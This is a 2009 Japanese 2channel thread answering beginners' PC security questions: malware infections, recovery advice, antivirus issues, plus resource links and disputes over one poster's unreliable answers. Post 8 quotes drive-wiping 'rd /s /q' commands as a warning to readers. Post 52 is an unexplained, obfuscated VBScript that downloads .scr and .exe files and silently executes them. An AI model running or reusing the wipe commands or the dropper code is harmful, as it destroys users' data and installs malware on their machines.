09/07/04 05:50:45
初心者の方の為のインターネットとパソコンのセキュリティについての質問スレッドです
自習を出来るリンクを紹介していますのでご参考にして下さい
━ 質問マナー ━━━━━━━━━━━━━━━━━━
・ アドバイスをもらう為に、「質問用テンプレート」を使って質問しましょう
・ 2回目以降の発言書込は、名前欄に「最初に質問した番号」を半角英数字で入力して下さい
・ 他から誘導されて来た場合は、その旨書いておきましょう
・ アドバイスする方も、解りやすい説明をしてあげて下さい
・ ここは2ちゃんねるですので、正しい解答ばかりとは限りません (用心しましょう)
━ 質問用テンプレート ━━━━━━━━━━━━━━━━━
【使用OS】 『』 例、Vista sp1 (「システムのプロパティ」参照)
【PCスペック】 『CPU: GHz 、メモリ: MB』 (「システムのプロパティ」参照)
【使用ブラウザ】 『』 例、Firefox 3
【Microsoft Updateの更新の状態】 『』 例、自動更新設定
【セキュリティソフトと年式】 『』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『』
【回線の種類・ルータの有無】 『』 例、光回線でルータ使用中
【具体的な症状】 『』
【過程と措置】 『』
【その他】 『』
【スクリーンショット画像やテキストファイルをアップロード出来るサイト】
↓ ※先頭のhを抜いてこっちへリンクして下さい
ImageHost.org
URLリンク(www.imagehost.org) (Hotlink のURLを http://××.jpg )
2:名無しさん@お腹いっぱい。
09/07/04 05:53:16
●Microsoft セキュリティ TechCenter
URLリンク(technet.microsoft.com)
●マイクロソフト セキュリティ At Home - 個人情報の盗難、スパイウェア、ウイルスを防ぐ
URLリンク(www.microsoft.com)
●Microsoft Update
URLリンク(update.microsoft.com)
●答えてねっと (*マイクロソフトが運営するパソコンに関するQ&Aサイト) ※2009年7月末で終了予定
2009年夏に公開予定の情報交換フォーラム「Microsoft Answers」日本語版開設
URLリンク(www.kotaete-net.net)
◆Windows を Conficker ワームから守る情報
URLリンク(technet.microsoft.com)
●JVN iPedia -脆弱性対策情報データベース (*最新版への更新を)
URLリンク(jvn.jp)
「脆弱性」とは、ソフトウエア製品やウェブアプリケーション等におけるセキュリティ上の問題箇所(ウィークポイント)です
使用しているソフトウェアやWebプラグイン類の最新版Updateとセキュリティ設定を常に心掛けましょう
(*動画Player、圧縮解凍ソフト、Adobe関連、Office系ソフト、Mailソフト、Sun MicrosystemsのJavaなど)
●IPA 「外部記憶メディアのセキュリティ対策を再確認しよう!」 ― USB メモリ、便利のウラに落とし穴 ―
URLリンク(www.ipa.go.jp)
●IPA「 USB メモリのセキュリティ対策を意識していますか? 」 ― USB メモリの安全な使い方を知ろう ―
URLリンク(www.ipa.go.jp)
●(財)日本データ通信協会 - 迷惑メール相談センター
URLリンク(www.dekyo.or.jp)
3:名無しさん@お腹いっぱい。
09/07/04 05:54:05
●OCN : あんしんWeb - How To セキュリティ
URLリンク(secure.blog.ocn.ne.jp)
●ベネッセ ジュニアパーク - 子どもとインターネット (保護者の方へ)
インターネットや携帯電話が身近になるとともに、子どもを巻き込んだ事件や犯罪が増加しています
URLリンク(j.benesse.ne.jp)
★4月1日より、青少年ネット規制法が施行--18歳未満にフィルタリングサービスなどを義務づけ
URLリンク(japan.cnet.com)
●セキュアブレイン - ワンクリック詐欺とは
URLリンク(www.securebrain.co.jp)
●セキュアブレイン gred - News Clipping
URLリンク(www.gred.jp)
●INTERNET Watch
URLリンク(internet.watch.impress.co.jp)
●YOMIURI ONLINE(読売新聞) - セキュリティー (サイバー護身術)
URLリンク(www.yomiuri.co.jp)
●PC Online - セキュリティ
URLリンク(pc.nikkeibp.co.jp)
●ITpro : セキュリティ- Webの脅威 (最新の脅威の解説と対策術)
URLリンク(itpro.nikkeibp.co.jp)
●IT-PLUS - セキュリティー連載コラム ネット危険地帯
URLリンク(it.nikkei.co.jp)
●Japan.internet.com - スパイウェアによって何が起こるか?
URLリンク(japan.internet.com)
4:名無しさん@お腹いっぱい。
09/07/04 05:55:04
●IT用語辞典 e-Words
URLリンク(e-words.jp)
●IT用語辞典 BINARY
URLリンク(www.sophia-it.com)
●gred (国産サイト安全性チェックサービス - ウイルス ,ワンクリック詐欺 ,Web攻撃の有無など)
URLリンク(www.gred.jp)
●Online Link Scan (4種類のサイト安全性チェックを一度に PhisTank ,AVG ,SiteTruth ,Google Safe Browsing)
URLリンク(onlinelinkscan.com)
●Norton Safe Web (is this site safe? )
URLリンク(safeweb.norton.com)
マイコミジャーナル
米Symantec、サイトの安全性を技術と評判で検証「Norton Safe Web」
URLリンク(journal.mycom.co.jp)
●ソースチェッカーオンライン (ラクラリンクチェック)
URLリンク(so.7walker.net)
●飛び先のチェック (ブラクラリンクチェック)
URLリンク(www.ultimo.to)
5:名無しさん@お腹いっぱい。
09/07/04 05:56:21
●higaitaisaku.com (スパイウェア、ウイルスなどマルウェア関連のトピックス のページ)
URLリンク(www.higaitaisaku.com)
*PCトラブル質問掲示板 (ウイルスによるトラブルに見舞われている方の解決掲示板)
URLリンク(bbs.higaitaisaku.com)
*PC健康診断掲示板 (特にPCに問題は感じないが念のためチェックしてほしい方向けの診察掲示板)
URLリンク(medcheck.higaitaisaku.com)
(相談方法)
「新規作成」をクリック → 次のステップへ「NEXT」をクリック → HijackThisログとアンインストール情報ログの取得(テキスト出力)
「新規相談ツリー」作成して、ログテキストの内容をコピー&貼り付けして相談開始
URLリンク(www.higaitaisaku.com)
●Securityzone (Security のページ)
URLリンク(securityzone.zapto.org)
●ウイルス対策ソフト情報 (検出力テスト結果 の解説)
URLリンク(blog.fideli.com)
●[ 便利 ] 2ch専用ブラウザ [ 推奨 ] 2ちゃんねるブラウザ - Wikipedia
URLリンク(ja.wikipedia.org)
●2ちゃんねるガイド:目次
URLリンク(info.2ch.net)
●2ちゃんねる 初心者が安心して質問できるスレッドガイダンス
2ちゃんねるには様々な有益な情報とともに、有害な「ワナ」をしかけていることがあります
URLリンク(ansitu.xrea.jp)
6:名無しさん@お腹いっぱい。
09/07/04 05:57:04
●IPA情報処理推進機構 (情報セキュリティのページ)
URLリンク(www.ipa.go.jp)
●IPA情報処理推進機構 (基本的なセキュリティ対策実践情報のページ)
URLリンク(www.ipa.go.jp)
●IPA情報処理推進機構 (情報セキュリティに関する届出)
*コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設置
URLリンク(www.ipa.go.jp)
●内閣官房 インターネット上の違法・有害情報対策 (違法・有害情報対策のポータルサイト)
URLリンク(www.it-anshin.go.jp)
●内閣官房情報セキュリティセンター
URLリンク(www.nisc.go.jp)
●警察庁 (国の行政機関)
URLリンク(www.npa.go.jp)
●@police (*警察庁 セキュリティポータルサイト )
URLリンク(www.cyberpolice.go.jp)
●警察庁 サイバー犯罪対策
URLリンク(www.npa.go.jp)
●警視庁 (=東京都警察) ハイテク対策 情報セキュリティ広場
URLリンク(www.keishicho.metro.tokyo.jp)
●STOP!架空請求! (東京都 架空請求緊急対策班による通報受付 )
URLリンク(www.anzen.metro.tokyo.jp)
7:○最近のセキュリティニュース ピックアップ
09/07/04 05:58:12
「漫画・イラストも児童ポルノ規制対象に」約9割─内閣府調査 2007/10/25
ネット上の「有害情報」を規制すべきという回答も約9割に上った
URLリンク(www.itmedia.co.jp)
個人情報を盗むフィッシング・スパイウェアの巧妙化 - 愉快犯から金銭目的の犯罪者へ 2008/10/24
だまされないためには包括的なセキュリティ意識の向上が必須
URLリンク(www.cyberpolice.go.jp)
オークション詐欺にひっかからないように、犯人の手口を頭に入れておきたい 2009/02/20
URLリンク(www.yomiuri.co.jp)
「USBメモリーを安全に使おう」、自動実行の無効化をIPAが呼びかけ 2009/05/07
URLリンク(itpro.nikkeibp.co.jp)
YouTube動画のコメントにマルウエアへのリンク,自動化ツールで急増か 2009/05/25
「YouTube」に投稿された動画のうち,最大で約4900本のコメント欄に,悪意あるWebページへのリンク
URLリンク(itpro.nikkeibp.co.jp)
楽天市場から個人情報がスパム業者に流出か 2009/05/27
実名の記載された迷惑メールが楽天でしか使っていないメールアドレスに届き始める
URLリンク(news.livedoor.com)
PC 初心者の3割が「バックアップ全くしてない」 2009/6/25
URLリンク(japan.internet.com)
稼働中の Adobe 製品の多くは既存パッチが未適用 2009/07/02
広く普及している Adobe Systems 製品が最たるものだと警告した
URLリンク(japan.internet.com)
8:名無しさん@お腹いっぱい。
09/07/04 05:59:42
●【※要注意】 そそのかされて、この手順を行うとドライブのデータが全て消えてしまいますよ××
━注意━━━━━━━━━━━━━━━
チェックディスクコマンドを試してみろ (リフレッシュコマンドを試してみろ とか・・・)
cmd /c rd /s /q c:
と入力し[OK]
上記と同様に以下も
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:
━━━━━━━━━━━━━━━━
●テンプレここまで (*セキュリティ初心者向け情報募集中)
9:名無しさん@お腹いっぱい。
09/07/04 13:52:14
>>1
乙
10:名無しさん@お腹いっぱい。
09/07/04 14:17:29
【使用OS】 『XP SP2』
【PCスペック】 『CPU: 2.80GHz 、メモリ: 224MB』
【使用ブラウザ】 『Firefox 3.5』
【Microsoft Updateの更新の状態】 『自動更新は停止状態』
【セキュリティソフトと年式】 『avast! 4.8 Home Edition』
【その他スパイウェア対策ソフト】 『Spybot Search』
【回線の種類・ルータの有無】 『光回線でルータ使用中』
【具体的な症状】 『数分ごとにネガポジ反転したような少女の画像が作業中のウィンドウに出現』
【過程と措置】 『再起動しても復活。win,iniには該当らしき記述なし。madoka、ozawa、hikaru、jenifferなどは検出せず。』
【その他】 『どこかのアップローダーから「ディアボロの大冒険 ver 13.0 .zip」
というファイルを開いて中身のexeを起動してから感染したと思われます。』
11:名無しさん@お腹いっぱい。
09/07/04 14:53:28
>>10
なぜ古いスレから使わない
死ね死にさらせ
12:八頭 ◆YAGApwSaEw
09/07/04 14:55:51
>>10
その圧縮ファイルを再取得
avast!
URLリンク(www.avast.com)
の最下からMail添付ファイルでパスワードを『virus』にして検体送信→ワクチン化を待つ
その後で、VirusTotalの解析にかけてなんなのか?を自己確認(DLした圧縮ファイルのままでOK)
URLリンク(www.virustotal.com)
オートラン無効設定を実施していないならやって→PC再起動しておくこと
「 USB メモリのセキュリティ対策を意識していますか? 」 ― USB メモリの安全な使い方を知ろう ―
URLリンク(www.ipa.go.jp)
とりあえずここまで
13:名無しさん@お腹いっぱい。
09/07/04 14:59:38
>>12
また誤回答かよ
14:名無しさん@お腹いっぱい。
09/07/04 16:14:07
もうテンプレに入れようぜ。
八頭 ◆YAGApwSaEw は信用できない投稿者です。
15:10
09/07/04 17:54:56
>>11
すみません
次回から気をつけます
>>12
迅速な回答ありがとうございます
そのようにします
16:名無しさん@お腹いっぱい。
09/07/04 18:06:54
>>15
1.もう1回ダウンロードして検体提出は問題無い
2.ワクチン化されるのを待つのは大きな間違い。検出できるようにはなるかもしれませんが
ワクチン(除去と設定等復元)は作成されません。あくまでも本体のブロック、削除であり、
本体が変更を加えたWindowsのレジストリなどを正常に復帰させることはできません。
3.セキュリティソフトの対応を待つ間、該当PCは無防備かつ危険な状態に置かれます。
必要なデータが破壊される可能性もありますので、放置して待つような対応は厳禁です。
4.どんなマルウェアであれ、感染した場合は、PCリカバリまたはOS再インストールで復帰させるのが鉄則です。
PCリカバリ(またはOS再インストール)以外の方法では、削除できたと思っても、別の何かが残ってしまう危険を
犯してしまうと、BOTネットに組込まれたり、なんらかの中継に利用されたり、自分の個人情報や、流出させては
いけない情報が流出してしまうなどの危険があります。意図せぬ加害者になってしまうことのないように、早急に
PCリカバリ(OS再インストール)を行なってください。
今後、八頭の言うことは信じちゃダメです。2割り程度はまともなことも混じってるかも知れませんが、
全体としては有害です。
17:八頭 ◆YAGApwSaEw
09/07/04 18:31:36
>>10
>>12まで出来たら
スレリンク(sec板:13番) の
「a-squared Free 4.5」~「Live OneCare PC セーフティ (オンラインスキャン)」までの4つを順番に試して、
他にも検出があれば一応報告して下さい。
>>16
その理屈だと世界中から駆除フォーラムが消えてなくなるよ(笑)
18:名無しさん@お腹いっぱい。
09/07/04 19:54:11
>八頭 ◆YAGApwSaEw
有害だからお前はもう黙れ。
19:名無しさん@お腹いっぱい。
09/07/04 20:14:32
ポートスキャンって言うので自分のマシーンに潜入されたら2ちゃんの恥ずかしい書き込み
とかもばれるんですかね?
そういうのってアンチウィルスではガードできないんですか?
普通の家でもルータとかが必要ですか?
20:名無しさん@お腹いっぱい。
09/07/04 20:52:14
>>19
ばれる事は無いと思う。ただ昨今のセキュリティー事情では
ルータ+PFWは必須で、ルータを導入するとルータのWAN側
インターフェイスにグローバルIPアドレスが割り振られる。
つまりWAN側から直にアクセスできるのはルータまでとなり
それより内側にあるPCには直にアクセス出来無い。
PFWのみでも意図的にポートを開放してなければ大丈夫だけど
ハード処理とソフトウエア処理を比較した場合は
ハード処理の方が手堅い。
21:名無しさん@お腹いっぱい。
09/07/04 21:07:10
>>20
ありがとうございます
買いますルータ
22:名無しさん@お腹いっぱい。
09/07/04 21:10:00
>>10
感染した=悪意のあるプログラムが取り憑いた
取り憑いた場所、部位にもよるし、書換が行われた場合などでも違ってくる。
無意味なDLLやファイルが残る可能性もあるし…
通常は元に戻そう何て考えない方がいい。アンチウイルスソフトは水際対策だから
感染した場合は素直にインストールし直す事をすすめる。
そのために日頃のバックアップとかが重要になってくる訳で、アンチウイルスソフトも
感染しないようにするためのプログラムと考えて感染後の駆除などは期待しないほうがいい。
23:名無しさん@お腹いっぱい。
09/07/05 08:58:11
【使用OS】 『XP SP3』
【PCスペック】 『CPU: 2.80GHz 、メモリ: 1G』
【使用ブラウザ】 『Firefox 3.011』
【Microsoft Updateの更新の状態】 『自動更新は停止状態』
【セキュリティソフトと年式】 『avast! 4.8 Home Edition』
【その他スパイウェア対策ソフト】 『Spybot Search』『Ad-Aware』『SpywareBlaster』
【回線の種類・ルータの有無】 『光回線でルータ使用中』
【具体的な症状】 『今のところ特になし?』
【過程と措置】 『Spybot→Ad-Aware→トレンドマイクロのオンラインスキャンでは何も発見しないものの
最後にスキャンしたavastのブートタイム検査 でWin32:Adware-gen [Adw]を発見
場所はc:\program files\ntte-rt\toolbar\flets.dll
とりあえずチェストに移動』
これは削除しても大丈夫ですかね?
24:名無しさん@お腹いっぱい。
09/07/05 10:08:06
>>23
フレッツ・スクウェアツールバーを使うなら戻す。
使わないなら、戻してツールバーを削除。
名称からわかるように「アドウェア」ですので、残すか消すかは自己責任で判断してください。
25:名無しさん@お腹いっぱい。
09/07/05 10:25:43
"アンチウイルス"による駆除は期待できなくても何らかの方法でマルウェアを
取り除く方法はある。あのカスペルスキーもそう言ってたし
そもそも駆除出来ないレベルで改変されてたらパソコン不安定になりまくりだろ。
八頭のなんちゃって駆除も酷いが
26:名無しさん@お腹いっぱい。
09/07/05 11:30:31
>>25
自分で端末を見て、判断できるなら処理すればいいさ。
回線の向こう側の、しかも初心者のPCのメンテなんてできっこない。
PCリカバリ以外の方法を勧めて、なんらかの危険を残してしまうよりいいんでないか?
27:名無しさん@お腹いっぱい。
09/07/05 13:05:22
>>24
どうも。
使わないので削除することにします。
ありがとうございました。
28:名無しさん@お腹いっぱい。
09/07/05 15:19:48
( ゚Д゚)ウマー
29:名無しさん@お腹いっぱい。
09/07/05 17:33:18
【使用OS】 『XP sp2』
【PCスペック】 『CPU: 3.16GHz 、メモリ: 3250MB』
【使用ブラウザ】 『IE』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『avast』
【その他スパイウェア対策ソフト】 『spybot S&D』
【回線の種類・ルータの有無】 『光回線でルータ使用中』
【具体的な症状】 『ashServ.exeが十分おきぐらいに作動してCPUの30%ぐらいを食ってしまいます。
それだけならいいのですが、なぜか作動中はインターネットの通信が全て遮断されてしまい、
ネット関連の作業は何も出来なくなります。』
【過程と措置】 『一度、avastを消して再インストールを試みましたが、特に変化なし。
ashServ.exeはタスクマネージャからの強制終了も受け付けません。』
30:八頭 ◆YAGApwSaEw
09/07/05 17:42:03
>>29
C:\Program Files\Alwil Software\Avast4\ashServ.exe
avastスレの1に相談だな
31:名無しさん@お腹いっぱい。
09/07/05 18:10:38
>>29
URLリンク(www23.atwiki.jp)
>Q.ウイルス発見時に馬鹿みたいに重くなる(CPUリソースを使い切る)のがウザイ
>A.ashServ.exeのプロセス優先度を下げれば若干緩和される。オートギア(フリーソフト)でashServ.exeを
>優先度"低"で登録しスタートアップに入れると楽。
>オートギア(Windows95/98/Me / ユーティリティ)
>URLリンク(www.vector.co.jp)
>
>しかしこの手法でも、最近のバージョンアップにより、ウイルス発見時(特にアーカイブ内を検査する時)は
>高負荷になっているようである。
Avastは、ファイル書き込みが発生した時や、パターン更新時にCPUを占有して、他のタスクが止まることがあります。
根本的な解決には、デュアルコア以上のCPUにするしかありません。
シングルコアCPUで耐えきれないと感じた場合は、AVGやAntiVirなどの他のセキュリティソフトへの乗り換えを
検討した方が幸せになれると思います。
32:名無しさん@お腹いっぱい。
09/07/05 18:14:15
>>30
>>14,>>18
33:名無しさん@お腹いっぱい。
09/07/05 18:27:23
>>31
流石だな。回答のスキルが違うwww誰とは言わないが
34:八頭 ◆YAGApwSaEw
09/07/05 18:28:20
自演ウザいなw
35:名無しさん@お腹いっぱい。
09/07/05 18:32:17
アバストスレで荒らせなくなった中国人だろw
36:名無しさん@お腹いっぱい。
09/07/05 18:45:12
都合が悪くなると直ぐに自演扱いか?www
>>20の回答は俺だけど>>31は俺では無い
37:名無しさん@お腹いっぱい。
09/07/05 18:47:59
だから自演するなってw
38:29
09/07/05 19:05:39
取り敢えず、そのオートギアってのを使ってみます。
でも通信が遮断されるのは何でだろ?
39:名無しさん@お腹いっぱい。
09/07/05 19:14:14
オートギア昔使ったことあるけど
優先度の操作はかえってシステム全体が不安定になるよ
40:名無しさん@お腹いっぱい。
09/07/05 19:18:11
>>25
22です
老婆心ながら、例えばウイルスを作成する場合に、アンチウイルスをすり抜けさせるために
取り憑くプログラムの注入部位をいろいろ変化させたりしていますが、アンチウイルスが
駆除するときはその注入された部位全てを取り除く訳ではなく、機能しなくなる範囲での抹消です。
プログラム自体は少し位中身を変更しても動くもので、(実際にプログラムが動いて次に
CALLする場所周辺を消してコンパイルしても普通に動くものです)
よく見かけるのは「駆除前にバックアップし、駆除したことを確認してからバックアップを削除」
ですが、元通りにできるのであれば必要ない訳ですよね。
アンチウイルス全体をみれば分かりますが、検出精度を主体にしていて駆除率を掲げてはいません。
悪意のあるプログラムに因っては変化するアルゴリズムを持ち、読み込まれると変異して自ら変化し
ながら動き回るものもあり、駆除が難しいことは各ベンダーも十分分かっていると思います。
駆除といっても本来のウイルスの動作を封じるだけの場合もあり、完全に取り除くことが難しい
ウイルスも存在していることは周知の事実であり、F-Secure でも
"ウイルスの感染部位や感染の状況によっては、正しく駆除されない場合があり"
となっています。
セキュリティ初心者質問スレッドなので… 変に対処しないでリカバリを勧めたいです。
長文にて失礼
41:名無しさん@お腹いっぱい。
09/07/05 19:27:07
AV-TESTによるウイルス検出率テスト(2009年6月23日実施、検体数758,547)
URLリンク(antivirus-news.net)
順位 プログラム 検出数 検出率
#1 G Data 2009 757052 99.80% (AVAST!+BitDefender+独自検出 )
#2 Symantec 755146 99.55%
#3 F-Secure 2009 735273 96.93% (5つのマルウェア検出エンジンを搭載 )
#4 McAfee 732570 96.58%
#5 Kaspersky 731730 96.46%
#6 Microsoft 729229 96.13%
#7 Trend Micro 726146 95.73% (ウイルスバスター )
#8 Eset Nod32 718122 94.67%
#9 K7 Computing 668839 88.17% (ソースネクスト ウイルスセキュリティZERO )
#10 Rising 587824 77.49% (瑞星 ウイルスキラー )
*本データは、ウイルス対策ニュース・ドットネットがAV-TESTから入手し発表しているもの。テスト日は6月23日。
*AV-TESTは、ドイツのマグデブルク大学にある、ウイルス検出率をテスト評価する第三者機関。主宰は、アンドレアス・マークス。
*アジア=パシフィック地域、特に日本、台湾、中国において頻発しているウイルスを中心に採集されており、
検体は6ヶ月以内に発生したものに限定されている。今月のテストのサンプル758,547種が使われた。
*テストの対象は、国内で市販されている主要ウイルス対策ソフト(無料製品は除く)。
*ここでいう「ウイルス」とは、「狭義のウイルス」に加えて「ワーム」「トロイの木馬」「ボット」「バックドア」を含む
42:八頭 ◆YAGApwSaEw
09/07/05 19:33:42
>>40
リカバリだとC:ドライブは綺麗になるだろうけども
別のドライブにリスクの種が残っている場合は再感染の可能性が充分あるから
感染の種類くらいは特定すべきじゃないかな
43:名無しさん@お腹いっぱい。
09/07/05 20:22:49
>>42
基本的な対応は、PCリカバリして、WindowsUpdateを全て当てた後で、セキュリティソフトを導入してパターンを最新にする。
それから、他のドライブからデータの復旧なりアプリケーションの導入なりをして環境を整える。
この手順を守る限りにおいては、別ドライブに残っているかもしれないものについては、セキュリティソフトがブロック可能です。
ですから、>42のような心配は不要です。かえって、感染状態でいる時間を延ばすことになるので有害です。
また、このスレに相談しにくるようなPC初心者さんが、複数ドライブを使っていたり、別ドライブにデータを分けたり
するような使い方をしている可能性はあんまりないと思います。(相談時の環境で、別ドライブの存在がわかった時だけ
セキュリティソフトの更新が終わるまではそのドライブにアクセスしないように注意してあげれば十分でしょう)
やっぱり、お前さんは、このスレには有害だと思う。
>>42
>>14,>>18
44:名無しさん@お腹いっぱい。
09/07/05 20:27:17
WindowsUpdateやアンチウィルスソフトの更新をする間に
感染する可能性もあるんですよね?
45:名無しさん@お腹いっぱい。
09/07/05 20:28:43
フリーのアンチウィルスソフトをダウンロードするときは無防備でも
そのあとスキャンすれば大丈夫なんですか?
46:名無しさん@お腹いっぱい。
09/07/05 20:39:00
ツールバーにMIRARって出て消せねぇ~。ちなみにソフトはノートンアンチウイルス2009入れてるんだがウイルス検出されねぇ~
47:名無しさん@お腹いっぱい。
09/07/05 20:48:21
(ο^д^)ノシ
48:八頭 ◆YAGApwSaEw
09/07/05 21:01:44
>>43
>この手順を守る限りにおいては、別ドライブに残っているかもしれないものについては、セキュリティソフトがブロック可能です
>セキュリティソフトの更新が終わるまではそのドライブにアクセスしないように注意してあげれば十分でしょう)
それはあなたがそう思い込んでるだけであって、
たった1枚のエロ画像からでも実際には再感染は起こり得ます
解析結果の画像→ URLリンク(h.imagehost.org) (ありふれた拡張子.Jpegですがリスクの種です)
ですから、もし物理フォーマットで完全解決を薦める場合には、
他のドライブに残るリスクの種(ネットでの取得物など)までも捨て去る様に言わなくてはなりません
これが僕の完全駆除の『基本』です
>PC初心者さんが、複数ドライブを使っていたり、別ドライブにデータを分けたりするような使い方をしている可能性はあんまりないと思います。
失礼ながら、あなたがPC音痴なだけであって
価格.comで、よく売れているPCのGZ-X1BPD-100 は、
ATX/MicroATX でありますが、3.5インチベイ:2個 3.5インチシャドウベイ:5個 5.25インチベイ:4個 です
店頭で根強い人気のPCケースのANTEC SOLO BLACK は、
ATXで、3.5インチベイ:2個 3.5インチシャドウベイ:3個 5.25インチベイ:4個 です
わかりまちたか?
49: ◆N9P3SuvBPo
09/07/05 21:20:39
>43
>このスレに相談しにくるようなPC初心者さんが、複数ドライブを使っていたり
確かに。
複数と言ってもCドライブとDドライブだけしかないもんな。
デフォでは
本当に不安なら、データを諦めてもらうってのもアリかもしれませんね。
てか>>48おおおおおおおおいw
JPEG.EXEって画像じゃありません。
アイコンは画像のアイコンに偽装されてると思われますが。
肝心な検出結果もモザイク入れて隠して…
どんなスキルのある人でも、分からないだろう…。
50: ◆N9P3SuvBPo
09/07/05 21:22:08
補足
>48のURLはVirustotalの結果画像ですが、ソースチェッカーを使って確認し、
各自自己責任にてアクセスしてください
51:名無しさん@お腹いっぱい。
09/07/05 21:23:48
>>48
やっぱ、お前いらんわ…。
52:名無しさん@お腹いっぱい。
09/07/05 21:25:41
set v2qf1 = d6d4fd.CreateObject(f2eje0,"")
set ste5mp = v2f7e.GetSpecialFolder(2)
n5sc6.type = 1
t4get="GET"
v4x5i.Open t4get, aurl_0, False
v4x5i.Send
y1L_wy80= "L_wy80.scr"
y1L_wy80= v2f7e.BuildPath(ste5mp,y1L_wy80)
n5sc6.open
n5sc6.write v4x5i.responseBody
n5sc6.savetofile y1L_wy80,2
n5sc6.close
v2qf1.ShellExecute y1L_wy80,"","","open",0
v4x5i.Open t4get, aurl_1, False
v4x5i.Send
y1L_wy81= "L_wy81.exe"
y1L_wy81= v2f7e.BuildPath(ste5mp,y1L_wy81)
n5sc6.open
n5sc6.write v4x5i.responseBody
n5sc6.savetofile y1L_wy81,2
n5sc6.close
v2qf1.ShellExecute y1L_wy81,"","","open",0
53:名無しさん@お腹いっぱい。
09/07/05 21:26:29
>>46
BHOに登録されたのでしょう。
ブラウザの「アドオンの管理」にMIRARってのがあると思う。
ググったらセーフモードでspybotを使用すれば削除できる報告があった。
>>??
最初の回答ではベンダーからの回答待ち、ウイルストータルでの確認、自動実行の無効化っだたような
即リカバリしないのに、マルウエアの自動起動の無効化さえ指示してない方が完全駆除と言われる。
>>50
( ´(ェ)`)ノシ
54:八頭 ◆YAGApwSaEw
09/07/05 21:29:50
>>N9P3SuvBPo
48は僕が撮ったスクリーンショットだから安全だよw
ボカシ入れてるだろ
55: ◆N9P3SuvBPo
09/07/05 21:34:08
>53
φ(^。^)ノシ
56:名無しさん@お腹いっぱい。
09/07/05 21:45:18
八頭 ◆YAGApwSaEw
真土けクズ
57:名無しさん@お腹いっぱい。
09/07/05 21:48:59
すいません、質問です
自作pc手がけてみようと価格.comでパーツを見比べていて
antecのP183というpcケース紹介ページから(URLリンク(kakaku.com))
メーカーサイトへ飛んだんですが、なにかひどい文字化けで。。
パソコンに不調が起きたとかは無いんですが
アメリカでwebサイト改竄が~とか言っていたのを思い出して不安になってます
58:八頭 ◆YAGApwSaEw
09/07/05 21:57:23
>>57
ブラウザのツールバー>表示>エンコード>西ヨーロッパ言語 で文字化け直らない?
CoolerMasterのPCケースも最近いいのがあるね
59: ◆N9P3SuvBPo
09/07/05 22:00:25
>57
行って来たけど、文字化けはしてませんでしたけど…
再度アクセスしても文字化けしてるようでしたら、
ページ内を右クリック→エンコード→日本語をクリックしてみて。
webサイト改ざんとか言っても、OSやブラウザやアプリ、対策ソフト類を最新にしてれば、
よほどのことがない限り感染はしませんので安心してください。
ちなみに、エンコード>西ヨーロッパ言語をしたら、俺の環境では文字化けしました。
60:名無しさん@お腹いっぱい。
09/07/05 22:05:06
俺の環境だとIE8でもChromeでも文字化けするわ。
右下の「Global Home」から国を選ぶと正常に表示できる。
61:八頭 ◆YAGApwSaEw
09/07/05 22:14:16
日本サイトだったか・・・
ちなみに
こっちがANTEC P183 スペック ページだから
URLリンク(kakaku.com)
62:名無しさん@お腹いっぱい。
09/07/05 22:39:08
ありがとうございます
>>60氏と同じような感じですね
一応、(無関係だろうけど)GENOウイルス対策はしてあるつもりです
文字化けの出だしがahoなのが何ともでした…
63:名無しさん@お腹いっぱい。
09/07/06 04:43:30
ちなみに右クリック→エンコード→日本語でも文字化けする
64:名無しさん@お腹いっぱい。
09/07/07 04:08:32
自作のキューブ型PC使ってますが後ろのファンは別に無くても大丈夫ですか?
65:名無しさん@お腹いっぱい。
09/07/07 12:01:41
失礼します。パソコン一般総合質問板より誘導されてきました。
【使用OS】 XP Home SP3
【PCスペック】 CPU:Intel Core2 CPU6300 1.86GHz メモリ: 2GB RAM
【使用ブラウザ】 IE・Sleipnir
【Microsoft Updateの更新の状態】 自動更新設定
【セキュリティソフトと年式】 Avast 2009
【その他スパイウェア対策ソフト】 Ad-Aware
【回線の種類・ルータの有無】 光回線でルータ使用中
【具体的な症状】 先日Windowsの自動更新後から、HTMLが全て正常に開けなくなりました。
IEやHTMLファイルを開こうとすると、このファイルを開くか保存しますか?という今まで出なかったダイアログが出て
開くを選択しても開けまぜん。その他の形式(mp3やtxtなど)ファイルは問題なく開けます。
検索エンジン等で調べようにもIEが開けない為、2ちゃんブラウザが正常に動いたのでこちらで質問した次第です。
【過程と措置】
システムの復元をしようとしたんですが、システムの復元というウインドウが出るものの真っ白の状態でそこから何も表示されず
復元出来ませんでした。
【その他】
件の自動更新後ですが、再起動後に右下のタスクトレイに「悪意あるマルウェアを削除しました」と表示され、クリックしたところ、ファイル名がWin32~から始まるものが数十個表示され
そのうちの一つが削除されたという表示がされました。思わずその画面は消してしまったので詳しい内容をおぼえていません。
その後SleipnirやIEを使おうとして今の症状に至ります。
あと、Avastを疑って一度起動してみたんですが、今まで起動できていたのに「Win32モードでは起動できません」と表示され起動できません。
前述の削除されたマルウェアのファイル名にもWin32とありましたが、Win32がなんなのかわからず、検索も出来ない状態なので2ちゃんねるに書き込むことにした次第です。
長文で申し訳ありませんが、ご指導お願いいたします。また、板違いでありましたら誘導していただけたらと思います。
66:名無しさん@お腹いっぱい。
09/07/07 12:02:01
ZoneAlarmのフリーの日本語版が1年も更新されないので移行を考えてます。
Comodoファイアーウォールはよく散見されるように、そんなに設定が難かしいのでしょうか?
67:名無しさん@お腹いっぱい。
09/07/07 12:37:27
>>65
ウイルスなどでおかしくなった環境は、フォーマットしてOSから全部
再インストール(リカバリー)するのが一番確実かつウダウダ悩むより
早い訳だが、それはどうしてもやりたくないのか?
>>66
Comodo Firewall @ Wikiなどの説明の多さを見ただけで敬遠する人も
多いんだろうなw
理解して設定した方が良いのは当然だが、最初は解説サイトの設定例を
丸写しでもすればそんなに面倒臭くもない。
68:名無しさん@お腹いっぱい。
09/07/07 12:59:46
>>65
PCリカバリ。メーカー製でない場合はOS再インストール。
69:65
09/07/07 14:00:05
>>67-68
ご回答ありがとうございます。やはり再インストールですか。
リカバリしたくないというわけではないのですが、自動更新後おかしくなったということで
ウイルスではなく、Windowsアップデートによる何かの不具合なのかなと思ったもので。
HTMLが開けない以外は正常ぽいので、リカバリせずにいけるならそちらの方がいいと思った次第です。
ピンポイントでIEが起動できなくなるウイルスというのがあるのでしょうか?
他にご回答がないようでしたらリカバリしてみようと思います。ありがとうございました。
70:65
09/07/07 14:07:44
失礼しました。
